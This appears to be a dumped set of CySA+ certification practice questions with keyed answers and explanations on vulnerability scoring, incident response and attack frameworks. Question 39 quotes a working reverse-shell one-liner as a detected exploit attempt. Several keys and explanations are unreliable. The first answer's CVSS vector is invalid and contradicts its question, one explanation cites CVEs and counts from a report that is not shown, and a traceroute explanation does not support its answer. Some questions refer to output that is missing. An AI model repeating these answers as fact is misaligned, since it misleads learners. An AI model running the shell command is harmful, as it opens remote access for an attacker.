examtopics.com Flashcards

1
Q

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

A

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L

AV = Attack Vector (Network, Adjacent, Local, Physical)
AC = Attack Complexity (Low, High)
PR = Privileges Required (None, Low, High)
UI = User Interaction (None, Required)
S = Scope (Unchanged, Changed)
C = Confidentiality (None, Low, High)
I = Integrity (None, Low, High)
A = Availability (None, Low, High)

2
Q

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM.
B. IDS.
C. PKI.
D. DLP.

A

D. DLP.

Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without a proper authorization.

Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion, in use, or at rest.

3
Q

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header

A

B. Block requests without an X-Frame-Options header

The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser to not display the page within a frame.

4
Q

Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned.
B. Service-level agreement.
C. Playbook.
D. Affected hosts.
E. Risk score.
F. Education plan.

A

D. Affected hosts.
E. Risk score.

A vulnerability report should detail identified vulnerabilities, such as missing patches, incorrect configuration settings, and weak passwords, and include the following:

  • Details regarding the type of vulnerability
  • The number of instances
  • The affected systems
  • The risk levels
  • Recommendations
5
Q

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days.
B. A mean time to detect of 45 days.
C. A mean time to respond of 15 days.
D. Third-party application testing.

A

A. A mean time to remediate of 30 days.

6
Q

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:

Which of the following scripting languages was used in the script?

A. PowerShell.
B. Ruby.
C. Python.
D. Shell script.

A

A. PowerShell.

The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is a scripting language that can be used to automate tasks and manage systems.

7
Q

A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP; other times, it is accessible through HTTPS. Which of the following most likely describes the observed activity?

A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access.
B. An on-path attack is being performed by someone with internal access that forces users into port 80.
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80.
D. An error was caused by BGP due to new rules applied over the company’s internal routers.

A

B. An on-path attack is being performed by someone with internal access that forces users into port 80.

An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.

The fact that the company’s internal portal is sometimes accessible through HTTP (port 80) and other times through HTTPS (port 443) suggests that someone with internal access is actively manipulating the network traffic.

An issue with the SSL certificate (Option A) would generally result in HTTPS not working at all, rather than it being intermittently accessible.

A web server unable to handle an increasing amount of HTTPS requests (Option C) would likely result in performance issues or server errors, but it wouldn’t selectively redirect users to HTTP.

BGP (Border Gateway Protocol) is used for routing between autonomous systems on the internet, and it generally would not cause the internal portal to switch between HTTP and HTTPS. It is more relevant to external internet routing.

8
Q

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of internally available systems.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

A

B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System

9
Q

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A. Business continuity plan.
B. Vulnerability management plan.
C. Disaster recovery plan.
D. Asset management plan.

A

A. Business continuity plan.

Disaster recovery describes the efforts taken to restore infected systems to a safe operating state. By comparison, business continuity describes the work the organization does to keep running, manage the legal ramification of the event, keep staff employed, work with insurance companies, provide internal and external communications regarding the event and its ramifications, investigate the root cause, develop plans to prevent reoccurrence, and much more.

10
Q

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement.
B. Configure MFA with strict access.
C. Deploy an API gateway.
D. Enable SSO to the cloud applications.

A

A. Deploy a CASB and enable policy enforcement.

A Cloud Access Security Broker (CASB) is a specialized security solution designed to provide visibility and control over the use of cloud applications and services within an organization. It helps organizations identify and manage shadow IT by monitoring and controlling access to cloud applications.

11
Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN.
B. Vulnerability scanner.
C. DNS.
D. Web server.

A

C. DNS.

DNS Logs: DDoS attacks often involve overwhelming the DNS infrastructure to disrupt normal internet services. By reviewing DNS logs, the incident response team can identify abnormal traffic patterns, unusual queries, and potential signs of a DDoS attack targeting the organization’s DNS servers. Analyzing DNS logs can help pinpoint the attack source, the type of attack, and the affected domains.

12
Q

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization.
B. Reconnaissance.
C. Delivery.
D. Exploitation.

A

D. Exploitation.

The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target’s network and achieve their objectives. In this case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain. Official References: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

13
Q

An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

A. Exploitation.
B. Reconnaissance.
C. Command and control.
D. Actions on objectives.

A

B. Reconnaissance.

14
Q

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

A. Beaconing.
B. Domain Name System hijacking.
C. Social engineering attack.
D. On-path attack.
E. Obfuscated links.
F. Address Resolution Protocol poisoning.

A

C. Social engineering attack.
E. Obfuscated links.

15
Q

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

A. Conduct regular red team exercises over the application in production.
B. Ensure that all implemented coding libraries are regularly checked.
C. Use application security scanning as part of the pipeline for the CI/CD flow.
D. Implement proper input validation for any data entry form.

A

C. Use application security scanning as part of the pipeline for the CI/CD flow.

Continuous Integration/Continuous Deployment (CI/CD) pipelines are an integral part of modern software development practices. By incorporating application security scanning into the CI/CD pipeline, vulnerabilities can be identified and addressed at various stages of development, including during the build and deployment processes.

16
Q

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

A. Proprietary systems.
B. Legacy systems.
C. Unsupported operating systems.
D. Lack of maintenance windows.

A

A. Proprietary systems.

17
Q

The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and “ as the parameters used in the attempt.
B. The vulnerable parameter ID http://172.31.15.2/1.php?id-2 and unfiltered characters returned.
C. The vulnerable parameter and unfiltered or encoded characters passed > and “ as unsafe.
D. The vulnerable parameter and characters > and “ with a reflected XSS attempt.

A

D. The vulnerable parameter and characters > and “ with a reflected XSS attempt.

18
Q

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A. Develop a call tree to inform impacted users.
B. Schedule a review with all teams to discuss what occurred.
C. Create an executive summary to update company leadership.
D. Review regulatory compliance with public relations for official notification.

A

B. Schedule a review with all teams to discuss what occurred.

One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents.

19
Q

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A. Code analysis.
B. Static analysis.
C. Reverse engineering.
D. Fuzzing.

A

C. Reverse engineering.

Reverse engineering describes deconstructing software and/or hardware to determine how it is crafted. Reverse engineering’s objective is to determine how much information can be extracted from delivered software. For example, reverse engineering can sometimes extract source code, identify software methods and languages used, developer comments, variable names and types, system and web calls, and many other things. An adversary can perform reverse engineering on a software patch to identify the vulnerabilities it is crafted to fix, or an analyst can perform reverse engineering on malware to determine how it operates.

20
Q

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A. Hard disk.
B. Primary boot partition.
C. Malicious files.
D. Routing table.
E. Static IP address.

A

D. Routing table.

“Evidence capture prioritizes collection activities based on the order of volatility, initially focusing on highly volatile storage. The ISOC best practice guide to evidence collection and archiving, published as tools.ietf.org/html/rfc3227, sets out the general order as follows:

  • CPU registers and cache memory (including cache on disk controllers, GPUs, and so on)
  • Contents of system memory (RAM), including the following:
      ◦ Routing table, ARP cache, process table, kernel statistics
      ◦ Temporary file systems/swap space/virtual memory
  • Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices), including file system and free space
  • Remote logging and monitoring data
  • Physical configuration and network topology
  • Archival media”

21
Q

Which of the following security operations tasks are ideal for automation?

A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder.

B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.

C. Security application user errors: Search the error logs for signs of users having trouble with the security application. Look up the user’s phone number. Call the user to help with any questions about using the application.

D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of sender to the block list. Move the email to quarantine.

A

B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.

22
Q

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A. PCI Security Standards Council.
B. Local law enforcement.
C. Federal law enforcement.
D. Card issuer.

A

D. Card issuer.

23
Q

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A. Mean time to detect.
B. Number of exploits by tactic.
C. Alert volume.
D. Quantity of intrusion attempts.

A

A. Mean time to detect.

24
Q

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

A. The current scanners should be migrated to the cloud.
B. Cloud-specific misconfigurations may not be detected by the current scanners.
C. Existing vulnerability scanners cannot scan IaaS systems.
D. Vulnerability scans on cloud environments should be performed from the cloud.

A

B. Cloud-specific misconfigurations may not be detected by the current scanners.

Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners.

25
Q

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities.
B. Ensure that the case details do not reflect any user-identifiable information, password protect the evidence and restrict access to personnel related to the investigation.
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation.
D. Notify the SOC manager for awareness after confirmation that the activity was intentional.

A

B. Ensure that the case details do not reflect any user-identifiable information, password protect the evidence and restrict access to personnel related to the investigation.

26
Q

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan.
B. Determine the site to be used during a disaster.
C. Demonstrate adherence to a standard disaster recovery process.
D. Identify applications to be run during a disaster.

A

A. Agree on the goals and objectives of the plan.

27
Q

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A. Testing.
B. Implementation.
C. Validation.
D. Rollback.

A

C. Validation.

28
Q

The analyst reviews the following endpoint log entry:

[Captured log]

Which of the following has occurred?

A. Registry change.
B. Rename computer.
C. New account introduced.
D. Privilege escalation.

A

C. New account introduced.

The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.

29
Q

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment.
B. Security control plane.
C. Threat feed combination.
D. Single pane of glass.

A

D. Single pane of glass.

30
Q

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

A. wh4dc-748gy.lan (192.168.86.152)
B. officerckuplayer.lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)

A

E. p4wnp1_aloa.lan (192.168.86.56)

The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network.
https://github.com/RoganDawes/P4wnP1_aloa

31
Q

When starting an investigation, which of the following must be done first?

A. Notify law enforcement.
B. Secure the scene.
C. Seize all related evidence.
D. Interview the witnesses.

A

B. Secure the scene.

The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.

32
Q

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

A. The lead should review what is documented in the incident response policy or plan.
B. Management level members of the CSIRT should make that decision.
C. The lead has the authority to decide who to communicate with at any time.
D. Subject matter experts on the team should communicate with others within the specified area of expertise.

A

A. The lead should review what is documented in the incident response policy or plan.

The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

33
Q

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs.
B. Indicators of compromise.
C. Risk assessment.
D. Access control lists.

A

C. Risk assessment.

34
Q

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

A. Beaconing.
B. Cross-site scripting.
C. Buffer overflow.
D. PHP traversal.

A

A. Beaconing.

35
Q

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port.
B. Change the display filter to tcp.port==20.
C. Change the display filter to ftp-data and follow the TCP streams.
D. Navigate to the File menu and select FTP from the Export objects option.

A

C. Change the display filter to ftp-data and follow the TCP streams.

By changing the display filter to “ftp-data” and then following the TCP streams, the analyst can access and view the entire data transfer, which includes the contents of the downloaded files. This method allows you to reconstruct and view the files being transferred over FTP.

36
Q

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago, but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A. SLA.
B. MOU.
C. NDA.
D. Limitation of liability.

A

A. SLA.

37
Q

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

A. Command and control.
B. Actions on objectives.
C. Exploitation.
D. Delivery.

A

A. Command and control.

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

38
Q

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

A

B. Agent-based

Agent-based vulnerability scanning involves deploying scanning agents on the target systems. These agents perform the scanning locally on each system, reducing the need for extensive network traffic because the scanning is distributed. This approach is particularly well-suited for environments with dynamic IP addresses and remote workers because it doesn’t rely on centralized scanning servers or frequent network scans.

39
Q

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

A

B. Reverse shell

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.

40
Q

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

A

B. Weaponization

Weaponization in the context of vulnerability assessment and the Common Vulnerability Scoring System (CVSS) refers to the development and availability of tools, exploits, or malware that can take advantage of a vulnerability. When a widely available exploit, such as one used to deliver ransomware, becomes accessible to attackers, it significantly increases the severity of the vulnerability. This is because the exploitability of the vulnerability is heightened, leading to a higher CVSS score.

41
Q

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

A

D. 54.74.110.228

The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

42
Q

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

A

C. Agent-based scanning

43
Q

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }

A

D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }

This shell function uses traceroute to trace the route packets take to the destination given in $1. The -m 40 option caps the trace at a maximum of 40 hops. The awk 'END{print $1}' part prints the first field of the last line of the traceroute output, which is the number of the final hop, and the function then echoes the destination together with that value.

44
Q

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A. Implement step-up authentication for administrators.
B. Improve employee training and awareness.
C. Increase password complexity standards.
D. Deploy mobile device management.

A

B. Improve employee training and awareness.

45
Q

Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for.
B. Include references and sources of information on the first page.
C. Include a table of contents outlining the entire report.
D. Decide on the color scheme that will effectively communicate the metrics.

A

A. Determine the sophistication of the audience that the report is meant for.

46
Q

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air gapped sandbox for analysis.
B. Send the binaries to the antivirus vendor.
C. Execute the binaries on an environment with internet connectivity.
D. Query the file hashes using VirusTotal.

A

A. Upload the binary to an air gapped sandbox for analysis.

47
Q

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

A. OSSTMM
B. SIEM
C. SOAR
D. OWASP

A

C. SOAR

SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.

48
Q

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

A

A. Avoid

49
Q

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures.
B. Determine if an internal mistake was made and who did it so they do not repeat the error.
C. Present all legal evidence collected and turn it over to law enforcement.
D. Discuss the financial impact of the incident to determine if security controls are well spent.

A

A. Identify any improvements or changes in the incident response plan or procedures.

This helps in strengthening the organization’s security posture and ensuring a more effective response in the future.

50
Q

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication

A

A. Single pane of glass

A single pane of glass provides a unified dashboard and workflow for managing multiple feeds, data sources, and tools within one interface. This allows streamlining threat intel from disparate portals into one centralized view for improved efficiency and visibility.

51
Q

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK
B. Cyber Kill Chain
C. OWASP
D. STIX/TAXII

A

A. MITRE ATT&CK

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely used framework that provides a comprehensive matrix of known Tactics, Techniques, and Procedures (TTPs) used by various adversaries. It allows security analysts to compare and map the TTPs observed in their environment to those associated with known threat actors and groups. By using ATT&CK, analysts can gain insights into which adversaries may be responsible for specific incidents based on their TTPs, aiding in threat intelligence analysis and incident response.

52
Q

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

A

A. Eradication

Eradication involves the process of identifying and removing the root cause or vulnerability that led to the incident. In this case, the analyst has isolated the vulnerability and is actively removing it from the system. This step is crucial to prevent further exploitation of the same vulnerability and to ensure the incident does not recur.

53
Q

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network.
B. Reimage the PC based on standard operating procedures.
C. Initiate a remote wipe of Joe’s PC using mobile device management.
D. Perform no action until HR or legal counsel advises on next steps.

A

D. Perform no action until HR or legal counsel advises on next steps.

Before any technical actions are taken, it is crucial to involve HR and legal counsel to assess the situation, understand the legal implications of Joe’s actions, and determine the appropriate course. This ensures that any response is in compliance with employment laws and company policies.

54
Q

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts.
B. Employ a network-based IDS.
C. Conduct thorough incident response.
D. Enable SSO to enterprise applications.

A

A. Reduce the administrator and privileged access accounts.

Zero trust is a security framework that assumes that threats exist both inside and outside the network. It emphasizes the principle of “least privilege,” which means that users and systems should only have the minimum level of access necessary to perform their tasks.

55
Q

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis.
B. Log into the affected server and begin analysis of the logs.
C. Restore from the last known-good backup to confirm there was no loss of connectivity.
D. Shut down the affected server immediately.

A

A. Clone the virtual server for forensic analysis.

Cloning the virtual server allows the analyst to capture a snapshot of the system as it is, including all current data, configurations, and state. This cloned version can be analyzed in detail without affecting the integrity of the original server, which is crucial for any potential legal proceedings and for understanding the scope and details of the attack.

56
Q

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity.
B. Data exfiltration.
C. Anomalous activity on unexpected ports.
D. Network host IP address scanning.
E. A rogue network device.

A

A. C2 beaconing activity.

The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels.

57
Q

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees.
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement.
C. All new employees must take a test about the company security policy during the onboarding process.
D. All new employees must sign a user agreement to acknowledge the company security policy.

A

D. All new employees must sign a user agreement to acknowledge the company security policy.

Requiring new employees to sign a user agreement is a common and effective practice in organizations. It ensures that employees have acknowledged and agreed to adhere to the company’s security policies, including the prohibition of personal devices.

58
Q

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

A. Information sharing organization.
B. Blogs/forums.
C. Cybersecurity incident response team.
D. Deep/dark web.

A

A. Information sharing organization.

Information Sharing and Analysis Centers (ISACs) or other similar organizations are dedicated to sharing information about threats and vulnerabilities in specific sectors, including critical infrastructure and defense. Given the company’s role in the supply chain for a fighter jet, it would likely be a part of an industry-specific ISAC focused on defense or critical infrastructure. These organizations often have access to high-quality, vetted intelligence, including classified or sensitive information that may not be available through other channels. They also enable timely and relevant information sharing among members.

59
Q

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

A. To satisfy regulatory requirements for incident reporting.
B. To hold other departments accountable.
C. To identify areas of improvement in the incident response process.
D. To highlight the notable practices of the organization’s incident response team.

A

C. To identify areas of improvement in the incident response process.

Lessons learned are a critical component of the incident response process. They serve the purpose of reflecting on what went well and what could have been done better during the incident response.

60
Q
